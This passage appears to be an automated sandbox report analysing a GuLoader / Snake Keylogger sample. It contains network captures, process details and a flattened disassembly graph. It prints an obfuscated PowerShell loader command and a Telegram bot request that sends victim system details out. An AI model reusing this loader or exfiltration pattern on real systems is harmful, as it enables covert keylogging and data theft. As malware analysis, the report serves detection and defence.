                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0erhgb%2FI0fVPiOo3QgzqtuUVfKfexop8ACuR%2FZZARr9b0S6HbQwjJ48CkNFfndxLHxGINZdpZJBxAK%2F9PNY1Hht8Ph31jdc4radYiXIoVvdXixduLpRw6bqGfrG79LUOxzO%2Bwhy0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d8459f57d1a-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=2002&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1423001&cwnd=179&unsent_bytes=0&cid=30eebc8bba95207a&ts=138&x=0"
                                                                                                                                          2025-01-08 15:21:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.849723188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:33 UTC861INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:33 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664482
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Ff05bje8ZEsJ%2Bbg1m%2F86aFKuYyzyMyteUKy%2F4YVvz4u8w%2FfaOYyXI0vNv37ldRh0VbKCzpzK2OTAZMf3sS4FSkJQPoOPtIpVLdUk6dvdesAp%2B1o3bZsbdBayTVo%2BLwM6XkTXw96"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d8d387dc407-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1469&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1928665&cwnd=197&unsent_bytes=0&cid=e28f7d44e5deb097&ts=153&x=0"
                                                                                                                                          2025-01-08 15:21:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.849725188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:34 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:34 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664483
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B04g3PfjYz8xie3G9rOKDbNIVYjyKnft6AJHuY9rcTKg4w%2B9yIix2h3bz%2B5nPnjYxRmsDkafiLUnNcu%2BxNOYItNfFqBS7ZouEHoru%2FuArp7dtoJ0rJlyL1JAgKdhMe0JOFzAcaJ7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d962fc6f78d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1494&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=125&unsent_bytes=0&cid=1c106ad3f68ea58a&ts=156&x=0"
                                                                                                                                          2025-01-08 15:21:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.849727188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:36 UTC861INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:36 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664485
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5FU0zT2FRwagSTuKhKNOKGbsr0%2FDrFdFzI%2BQjyVnlw4HNT0N2H3A%2FKTpVEK6pLY%2FXds71ppqw3lqY9ExBYWnMk9GiQCaEIhP4dgqicCKTieaGdUG4eewP3Tu%2BbtuJEsFCq9V%2Fw8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2da02f1d422d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1660&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1671436&cwnd=232&unsent_bytes=0&cid=614319a04a809769&ts=156&x=0"
                                                                                                                                          2025-01-08 15:21:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.849728149.154.167.2204433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:36 UTC345OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:36 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:36 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-08 15:21:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:10:20:02
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\HVSU7GbA5N.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:650'314 bytes
                                                                                                                                          MD5 hash:9EEAA6C9CE625021AC21B5EB40FB73E7
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:10:20:03
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
                                                                                                                                          Imagebase:0xe20000
                                                                                                                                          File size:433'152 bytes
                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:10:20:03
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:10:21:05
                                                                                                                                          Start date:08/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                          Imagebase:0x2d0000
                                                                                                                                          File size:59'904 bytes
                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:20.7%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:22.9%
                                                                                                                                            Total number of Nodes:1244
                                                                                                                                            Total number of Limit Nodes:39
                                                                                                                                            execution_graph 3695 4019c0 3696 4029fd 18 API calls 3695->3696 3697 4019c7 3696->3697 3698 4029fd 18 API calls 3697->3698 3699 4019d0 3698->3699 3700 4019d7 lstrcmpiA 3699->3700 3701 4019e9 lstrcmpA 3699->3701 3702 4019dd 3700->3702 3701->3702 3703 4022c0 3704 4022f0 3703->3704 3705 4022c5 3703->3705 3706 4029fd 18 API calls 3704->3706 3707 402b07 19 API calls 3705->3707 3711 4022f7 3706->3711 3708 4022cc 3707->3708 3709 4029fd 18 API calls 3708->3709 3710 40230d 3708->3710 3712 4022dd RegDeleteValueA RegCloseKey 3709->3712 3714 402a3d RegOpenKeyExA 3711->3714 3712->3710 3721 402a68 3714->3721 3723 402ab4 3714->3723 3715 402a8e RegEnumKeyA 3716 402aa0 RegCloseKey 3715->3716 3715->3721 3718 405ee8 3 API calls 3716->3718 3717 402ac5 RegCloseKey 3717->3723 3720 402ab0 3718->3720 3719 402a3d 3 API calls 3719->3721 3722 402ae0 RegDeleteKeyA 3720->3722 3720->3723 3721->3715 3721->3716 3721->3717 3721->3719 3722->3723 3723->3710 3724 402b42 3725 402b51 SetTimer 3724->3725 3726 402b6a 3724->3726 3725->3726 3727 402bbf 3726->3727 3728 402b84 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3726->3728 3728->3727 3729 402645 3730 4029fd 18 API calls 3729->3730 3731 40264c FindFirstFileA 3730->3731 3732 40266f 3731->3732 3735 40265f 3731->3735 3737 405b1b wsprintfA 3732->3737 3734 402676 3738 405bbd lstrcpynA 3734->3738 3737->3734 3738->3735 3739 4023c8 3740 402b07 19 API calls 3739->3740 3741 4023d2 3740->3741 3742 4029fd 18 API calls 3741->3742 3743 4023db 3742->3743 3744 4023e5 RegQueryValueExA 3743->3744 3747 402663 3743->3747 3745 40240b RegCloseKey 3744->3745 3746 402405 3744->3746 3745->3747 3746->3745 3750 405b1b wsprintfA 3746->3750 3750->3745 3754 401ccc GetDlgItem GetClientRect 3755 4029fd 18 API calls 3754->3755 3756 401cfc LoadImageA SendMessageA 3755->3756 3757 401d1a DeleteObject 3756->3757 3758 402892 3756->3758 3757->3758 3759 4035cc 3760 4035d7 3759->3760 3761 4035db 3760->3761 3762 4035de GlobalAlloc 3760->3762 3762->3761 3763 4065cc 3765 40601b 3763->3765 3764 406986 3765->3764 3765->3765 3766 4060a5 GlobalAlloc 3765->3766 3767 40609c GlobalFree 3765->3767 3768 406113 GlobalFree 3765->3768 3769 40611c GlobalAlloc 3765->3769 3766->3764 3766->3765 3767->3766 3768->3769 3769->3764 3769->3765 3777 4024d1 3778 4024d6 3777->3778 3779 4024e7 3777->3779 3780 4029e0 18 API calls 3778->3780 3781 4029fd 18 API calls 3779->3781 3783 4024dd 3780->3783 3782 4024ee lstrlenA 3781->3782 3782->3783 3784 40250d WriteFile 3783->3784 3785 402663 3783->3785 3784->3785 3786 4025d3 3787 40283f 3786->3787 3788 4025da 3786->3788 3789 4029e0 18 API calls 3788->3789 3790 4025e5 3789->3790 3791 4025ec SetFilePointer 3790->3791 3791->3787 3792 4025fc 3791->3792 3794 405b1b wsprintfA 3792->3794 3794->3787 3802 4014d6 3803 4029e0 18 API calls 3802->3803 3804 4014dc Sleep 3803->3804 3806 402892 3804->3806 3807 401dd8 3808 4029fd 18 API calls 3807->3808 3809 401dde 3808->3809 3810 4029fd 18 API calls 3809->3810 3811 401de7 3810->3811 3812 4029fd 18 API calls 3811->3812 3813 401df0 3812->3813 3814 4029fd 18 API calls 3813->3814 3815 401df9 3814->3815 3816 401423 25 API calls 3815->3816 3817 401e00 ShellExecuteA 3816->3817 3818 401e2d 3817->3818 3819 40155b 3820 401577 ShowWindow 3819->3820 3821 40157e 3819->3821 3820->3821 3822 402892 3821->3822 3823 40158c ShowWindow 3821->3823 3823->3822 3623 401edc 3624 4029fd 18 API calls 3623->3624 3625 401ee3 GetFileVersionInfoSizeA 3624->3625 3626 401f06 GlobalAlloc 3625->3626 3629 402892 3625->3629 3627 401f1a GetFileVersionInfoA 3626->3627 3626->3629 3628 401f2b VerQueryValueA 3627->3628 3634 401f5c 3627->3634 3630 401f44 3628->3630 3628->3634 3635 405b1b wsprintfA 3630->3635 3632 401f50 3636 405b1b wsprintfA 3632->3636 3634->3629 3635->3632 3636->3634 3829 4018e3 3830 40191a 3829->3830 3831 4029fd 18 API calls 3830->3831 3832 40191f 3831->3832 3833 40547d 71 API calls 3832->3833 3834 401928 3833->3834 3041 404fe4 3042 405006 GetDlgItem GetDlgItem GetDlgItem 3041->3042 3043 40518f 3041->3043 3086 403ea8 SendMessageA 3042->3086 3045 405197 GetDlgItem CreateThread CloseHandle 3043->3045 3046 4051bf 3043->3046 3045->3046 3100 404f78 OleInitialize 3045->3100 3048 4051ed 3046->3048 3049 4051d5 ShowWindow ShowWindow 3046->3049 3050 40520e 3046->3050 3047 405076 3052 40507d GetClientRect GetSystemMetrics SendMessageA SendMessageA 3047->3052 3051 405248 3048->3051 3054 405221 ShowWindow 3048->3054 3055 4051fd 3048->3055 3088 403ea8 SendMessageA 3049->3088 3056 403eda 8 API calls 3050->3056 3051->3050 3059 405255 SendMessageA 3051->3059 3057 4050eb 3052->3057 3058 4050cf SendMessageA SendMessageA 3052->3058 3062 405241 3054->3062 3063 405233 3054->3063 3060 403e4c SendMessageA 3055->3060 3061 40521a 3056->3061 3066 4050f0 SendMessageA 3057->3066 3067 4050fe 3057->3067 3058->3057 3059->3061 3068 40526e CreatePopupMenu 3059->3068 3060->3050 3065 403e4c SendMessageA 3062->3065 3089 404ea6 3063->3089 3065->3051 3066->3067 3070 403e73 19 API calls 3067->3070 3069 405bdf 18 API calls 3068->3069 3071 40527e AppendMenuA 3069->3071 3072 40510e 3070->3072 3073 40529c GetWindowRect 3071->3073 3074 4052af TrackPopupMenu 3071->3074 3075 405117 ShowWindow 3072->3075 3076 40514b GetDlgItem SendMessageA 3072->3076 3073->3074 3074->3061 3078 4052cb 3074->3078 3079 40513a 3075->3079 3080 40512d ShowWindow 3075->3080 3076->3061 3077 405172 SendMessageA SendMessageA 3076->3077 3077->3061 3081 4052ea SendMessageA 3078->3081 3087 403ea8 SendMessageA 3079->3087 3080->3079 3081->3081 3082 405307 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3081->3082 3084 405329 SendMessageA 3082->3084 3084->3084 3085 40534b GlobalUnlock SetClipboardData CloseClipboard 3084->3085 3085->3061 3086->3047 3087->3076 3088->3048 3090 404ec1 3089->3090 3099 404f64 3089->3099 3091 404ede lstrlenA 3090->3091 3092 405bdf 18 API calls 3090->3092 3093 404f07 3091->3093 3094 404eec lstrlenA 3091->3094 3092->3091 3096 404f1a 3093->3096 3097 404f0d SetWindowTextA 3093->3097 3095 404efe lstrcatA 3094->3095 3094->3099 3095->3093 3098 404f20 SendMessageA SendMessageA SendMessageA 3096->3098 3096->3099 3097->3096 3098->3099 3099->3062 3101 403ebf SendMessageA 3100->3101 3102 404f9b 3101->3102 3105 401389 2 API calls 3102->3105 3106 404fc2 3102->3106 3103 403ebf SendMessageA 3104 404fd4 CoUninitialize 3103->3104 3105->3102 3106->3103 3842 4018e6 3843 4029fd 18 API calls 3842->3843 3844 4018ed 3843->3844 3845 4053d1 MessageBoxIndirectA 3844->3845 3846 4018f6 3845->3846 3107 401f68 3108 401f7a 3107->3108 3118 402028 3107->3118 3125 4029fd 3108->3125 3111 401423 25 API calls 3116 402181 3111->3116 3112 4029fd 18 API calls 3113 401f8a 3112->3113 3114 401f92 GetModuleHandleA 3113->3114 3115 401f9f LoadLibraryExA 3113->3115 3114->3115 3117 401faf GetProcAddress 3114->3117 3115->3117 3115->3118 3119 401ffb 3117->3119 3120 401fbe 3117->3120 3118->3111 3121 404ea6 25 API calls 3119->3121 3123 401fce 3120->3123 3131 401423 3120->3131 3121->3123 3123->3116 3124 40201c FreeLibrary 3123->3124 3124->3116 3126 402a09 3125->3126 3127 405bdf 18 API calls 3126->3127 3128 402a2a 3127->3128 3129 401f81 3128->3129 3130 405e28 5 API calls 3128->3130 3129->3112 3130->3129 3132 404ea6 25 API calls 3131->3132 3133 401431 3132->3133 3133->3123 3847 40426a 3848 4042a0 3847->3848 3849 40427a 3847->3849 3851 403eda 8 API calls 3848->3851 3850 403e73 19 API calls 3849->3850 3852 404287 SetDlgItemTextA 3850->3852 3853 4042ac 3851->3853 3852->3848 3854 40286d SendMessageA 3855 402892 3854->3855 3856 402887 InvalidateRect 3854->3856 3856->3855 3857 4014f0 SetForegroundWindow 3858 402892 3857->3858 3859 401af0 3860 4029fd 18 API calls 3859->3860 3861 401af7 3860->3861 3862 4029e0 18 API calls 3861->3862 3863 401b00 wsprintfA 3862->3863 3864 402892 3863->3864 3865 4019f1 3866 4029fd 18 API calls 3865->3866 3867 4019fa ExpandEnvironmentStringsA 3866->3867 3868 401a0e 3867->3868 3870 401a21 3867->3870 3869 401a13 lstrcmpA 3868->3869 3868->3870 3869->3870 3871 401c78 3872 4029e0 18 API calls 3871->3872 3873 401c7e IsWindow 3872->3873 3874 4019e1 3873->3874 3882 4014fe 3883 401506 3882->3883 3885 401519 3882->3885 3884 4029e0 18 API calls 3883->3884 3884->3885 3886 40227f 3887 4029fd 18 API calls 3886->3887 3888 402290 3887->3888 3889 4029fd 18 API calls 3888->3889 3890 402299 3889->3890 3891 4029fd 18 API calls 3890->3891 3892 4022a3 GetPrivateProfileStringA 3891->3892 3893 401000 3894 401037 BeginPaint GetClientRect 3893->3894 3895 40100c DefWindowProcA 3893->3895 3897 4010f3 3894->3897 3900 401179 3895->3900 3898 401073 CreateBrushIndirect FillRect DeleteObject 3897->3898 3899 4010fc 3897->3899 3898->3897 3901 401102 CreateFontIndirectA 3899->3901 3902 401167 EndPaint 3899->3902 3901->3902 3903 401112 6 API calls 3901->3903 3902->3900 3903->3902 3904 404601 3905 404611 3904->3905 3906 40462d 3904->3906 3915 4053b5 GetDlgItemTextA 3905->3915 3908 404660 3906->3908 3909 404633 SHGetPathFromIDListA 3906->3909 3911 40464a SendMessageA 3909->3911 3912 404643 3909->3912 3910 40461e SendMessageA 3910->3906 3911->3908 3914 40140b 2 API calls 3912->3914 3914->3911 3915->3910 3916 402602 3917 402892 3916->3917 3918 402609 3916->3918 3919 40260f FindClose 3918->3919 3919->3917 3920 402683 3921 4029fd 18 API calls 3920->3921 3922 402691 3921->3922 3923 4026a7 3922->3923 3924 4029fd 18 API calls 3922->3924 3925 405829 2 API calls 3923->3925 3924->3923 3926 4026ad 3925->3926 3946 40584e GetFileAttributesA CreateFileA 3926->3946 3928 4026ba 3929 402763 3928->3929 3930 4026c6 GlobalAlloc 3928->3930 3933 40276b DeleteFileA 3929->3933 3934 40277e 3929->3934 3931 40275a CloseHandle 3930->3931 3932 4026df 3930->3932 3931->3929 3947 40306b SetFilePointer 3932->3947 3933->3934 3936 4026e5 3937 403055 ReadFile 3936->3937 3938 4026ee GlobalAlloc 3937->3938 3939 402732 WriteFile GlobalFree 3938->3939 3940 4026fe 3938->3940 3942 402e62 37 API calls 3939->3942 3941 402e62 37 API calls 3940->3941 3945 40270b 3941->3945 3943 402757 3942->3943 3943->3931 3944 402729 GlobalFree 3944->3939 3945->3944 3946->3928 3947->3936 3948 401705 3949 4029fd 18 API calls 3948->3949 3950 40170c SearchPathA 3949->3950 3951 401727 3950->3951 3952 403f87 lstrcpynA lstrlenA 3134 40218a 3135 4029fd 18 API 